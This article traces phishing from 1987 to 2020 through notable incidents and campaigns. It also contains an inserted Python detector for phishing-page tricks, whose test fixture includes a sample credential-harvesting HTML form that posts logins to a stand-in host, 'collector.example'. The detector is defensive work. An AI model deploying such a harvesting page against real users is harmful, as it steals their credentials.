The history of phishing

Curious to learn how phishing evolved to become one of the greatest threats both consumers and businesses face?


40 years of phish

A phishing technique was described in detail in a paper and presentation delivered to the 1987 International HP Users Group, Interex.

The first known mention of the term ‘phishing’ was in 1996 in the hacking tool AOHell created by a well-known hacker and spammer.

The start

This is about the time phishing as we know it started, although the technique wasn't well known to the average user until almost 10 years later. Phishing scams use spoofed emails, fake websites and similar lures as a hook to get people to voluntarily hand over sensitive information, which is why the fishing metaphor stuck. The 'ph' spelling comes from 'phreaking', the exploration and exploitation of telephone systems practised by early hackers who called themselves 'phreaks'. Phreaks and hackers have always been closely related, and the spelling tied phishing attacks to those underground communities.

In a lot of ways, phishing hasn't changed much since the early AOL attacks. In 2001, however, phishers began targeting online payment systems. The first such attack hit E-Gold in June 2001, and later that year a "post-9/11 ID check" scam followed soon after the September 11 attacks on the World Trade Center.

Forgeries emerging

In 2003, phishers registered dozens of domains that closely resembled those of eBay and PayPal and could pass as the legitimate sites if you weren't paying close attention. Email worms sent phishing emails containing links to the fake sites to PayPal customers, asking them to update their credit card numbers and other personally identifiable information. The first known phishing attack against a bank was reported by The Banker in September 2003.

By early 2004, phishers were seeing major success. It is estimated that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling approximately US $929 million, and that United States businesses were losing about US $2 billion per year to it.

Almost half of phishing thefts in 2006 were committed by groups operating through the Russian Business Network based in St. Petersburg.

A report from Gartner in 2007 claimed 3.6 million users lost $3.2 billion in a one year span.

In 2008, phishers targeted RapidShare users to steal premium accounts. A premium account removed the speed caps on downloads, the automatic removal of uploads, the waits on downloads and the cool-down times between uploads, which made the service much more useful for hosting the files of a phishing campaign.

In January 2009, a single phishing attack earned cybercriminals US $1.9 million in unauthorized wire transfers through Experi-Metal's online banking accounts.

Technical sophistication

In March 2011, internal RSA staff were successfully phished, leading to the theft of the data underpinning RSA's SecurID tokens, which was later used in attacks on US defense contractors.

In August 2013, the Syrian Electronic Army spear-phished employees of the advertising platform Outbrain and used that access to place redirects on the websites of The Washington Post, Time and CNN, which carried Outbrain content.

In November 2013, Target suffered a data breach in which roughly 40 million payment card records and 70 million customer records were stolen; the attackers got in through a subcontractor whose credentials had been phished. Target's CEO and CIO resigned in the aftermath.

Between September and December 2013, CryptoLocker ransomware infected some 250,000 personal computers via two different phishing emails. The first, aimed at businesses, carried a ZIP attachment presented as a customer complaint; the second, aimed at the general public, contained a malicious link in a message about a problem clearing a check. CryptoLocker encrypts the files on the computer and demands payment in exchange for the key to decrypt them. According to Dell SecureWorks, 0.4% or more of those infected paid the ransom.

In January 2014, the Seculert Research Lab identified a new targeted attack that used Xtreme RAT (a remote access Trojan). Spear-phishing emails targeted Israeli organizations to deploy the malware; 15 machines were compromised, including some belonging to the Civil Administration of Judea and Samaria.

In August 2014, almost 500 private celebrity photos, many containing nudity, were leaked from iCloud. The investigation found that Ryan Collins had obtained them by sending the victims emails that looked like legitimate Apple and Google security warnings, alerting them that their accounts may have been compromised and asking for their account details. Victims who entered their passwords gave Collins access to their accounts, from which he downloaded emails and iCloud backups.

In September 2014, Home Depot suffered a massive breach: payment card data for about 56 million shoppers and some 53 million email addresses were stolen, and the card data was posted for sale on carding sites.

In November 2014, ICANN employees fell for spear-phishing emails that harvested their credentials. Using those credentials, the attackers accessed ICANN's Centralized Zone Data System (CZDS), obtaining zone files and personal data about CZDS users, including their real names, contact information and salted password hashes, as well as the ICANN Whois portal and other systems.

In August 2015, Cozy Bear, a hacking group attributed to the Russian Federation, was linked to a spear-phishing attack against the Pentagon email system that forced the shutdown of the unclassified email system used by the Joint Chiefs of Staff.

Also in August 2015, Fancy Bear (another Russian state-attributed group) used a Java zero-day exploit in spear-phishing attacks against the White House and NATO, spoofing the Electronic Frontier Foundation by directing targets to the fraudulent domain electronicfrontierfoundation.org (the EFF's real domain is eff.org).

In August 2016, the World Anti-Doping Agency reported a phishing campaign against its users in which emails claiming to be official WADA communications requested their login details. The registration and hosting information for the two domains named by WADA pointed to Fancy Bear.

In 2017, 76% of organizations surveyed reported experiencing phishing attacks, and nearly half of the information security professionals surveyed said the rate of attacks had increased since 2016.

In November 2017, Kazakhstan-born Canadian citizen Karim Baratov pleaded guilty to charges connected with the 2014 Yahoo breach, which affected about 500 million accounts, admitting that he had hacked accounts at the direction of Russian intelligence officers.

PhishLabs published analysis in December 2017 showing that phishers were adopting HTTPS on their sites more and more often. The practical lesson is that a padlock icon only means the connection is encrypted; it says nothing about whether the site behind it is legitimate.

A sextortion phishing campaign seen in July 2018 was the first to quote recipients' actual breached passwords in the emails to convince them that the hacking threat was real. Given the sheer volume of breached and stolen personal data now available online, this was flagged as a big threat to watch out for in 2018.

Researchers at FireEye examined over half a billion emails sent between January and June 2018 and found that one in 101 was outright malicious, sent with the goal of compromising a user or network.

Phishing campaigns during the partial U.S. government shutdown in January 2019 exploited widespread confusion over whether the IRS would be sufficiently operational to process tax returns and issue refunds.

Mastery

According to Microsoft, these are some of the innovative ways phishing attacks evolved from 2019 to 2020. Email links pointed to fake Google search results that led on to attacker-controlled, malware-laden websites. Email links pointed to non-existent pages on an attacker-controlled website so that a custom 404 page was served, which could be used to spoof the logon page of a legitimate site. And company-specific Office 365 sign-in pages were spoofed so realistically that users wouldn't give the logon page a second thought.
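As an added example (not code from the original page, from Microsoft, or from any vendor), the script below turns those observations into offline checks over constructed HTTP responses: a 404 status that nevertheless carries a password field, a form whose action posts credentials to a different host than the page was served from, and Office 365 branding on a sign-in form outside an assumed allowlist of Microsoft sign-in hosts. The sample pages, the attacker and collector hostnames, and the allowlist are all assumptions made for the illustration.

```python
"""Added example: heuristics for the phishing-page tricks described above
(a custom 404 page carrying a logon form, and an Office 365 sign-in page
hosted off-brand).  Illustrative code, not Microsoft's; the brand allowlist
and the sample responses below are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts on which a genuine Microsoft sign-in page may live.
BRAND_HOSTS = {"login.microsoftonline.com", "login.live.com"}


class _FormScanner(HTMLParser):
    """Collects <form action> targets, the page title and whether a
    password field is present."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password = False
        self.title = ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute values may be None
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password = True
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def assess(url, status, body):
    """Return the list of findings for one fetched page (empty = nothing odd)."""
    host = (urlparse(url).hostname or "").lower()
    scanner = _FormScanner()
    scanner.feed(body)
    findings = []
    # A 'page not found' response has no business asking for a password.
    if status == 404 and scanner.has_password:
        findings.append("logon form served on a 404 page")
    # Credentials posted to a host other than the one serving the page are
    # the classic sign of a harvesting form.
    for action in scanner.actions:
        target = (urlparse(action).hostname or "").lower()
        if target and target != host:
            findings.append(f"credentials posted off-host to {target}")
    # Microsoft branding on a sign-in form outside Microsoft's own hosts.
    if (scanner.has_password and "office 365" in scanner.title.lower()
            and host not in BRAND_HOSTS):
        findings.append("Office 365 branded sign-in on non-Microsoft host")
    return findings


# Constructed sample: a custom 404 page on an attacker-controlled host that
# imitates an Office 365 sign-in and posts credentials elsewhere.
PHISH_404 = """<html><head><title>Sign in to Office 365</title></head>
<body><form method="post" action="https://collector.example/login">
<input type="email" name="user"><input type="password" name="pw">
</form></body></html>"""

# Constructed sample: a sign-in page on an allowlisted host posting to itself.
LEGIT_LOGIN = """<html><head><title>Sign in to Office 365</title></head>
<body><form method="post" action="/common/login">
<input type="email" name="user"><input type="password" name="pw">
</form></body></html>"""

if __name__ == "__main__":
    for url, status, body in [
        ("https://contoso-mail.example/does-not-exist", 404, PHISH_404),
        ("https://login.microsoftonline.com/", 200, LEGIT_LOGIN),
    ]:
        print(url, "->", assess(url, status, body) or "no findings")
```

These checks are deliberately cheap so they can run on every URL a mail gateway detonates; the 404-with-password rule in particular catches the custom error-page trick regardless of how convincing the page looks, because it keys on the status code rather than on the HTML.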

Tax extension deadline schemes: in early 2020, even before COVID-19 became a widespread threat, the IRS saw more than $135 million in falsified tax refund claims, compared with $15 million in the same two-month period of 2019. With the Tax Day deadline extended to July 15 that year, phishers used the extra time to send phishing emails, texts and phone calls to steal tax refunds from hard-working Americans.

Imitating the CDC: in 2020, researchers found phishers sending emails posing as the Centers for Disease Control and Prevention (CDC). The messages often contained links claiming to lead to infection prevention measures and COVID-19 vaccine information; instead they delivered malware that could infect the user's device, potentially opening the door to ransomware or serving as a foothold into the user's company network.

The COVID-19 relief payment scam: in November 2020, the IRS teamed up with multiple states and industry organizations to warn U.S. citizens of an SMS-based phishing scam teasing a $1,200 economic impact payment from the 'COVID-19 TREAS FUND.' It stated, "Further action is required to accept this payment into your account. Continue here to accept this payment …" The link led to a phishing site imitating the IRS.gov Get My Payment website, where victims were asked to share their personal and bank account information.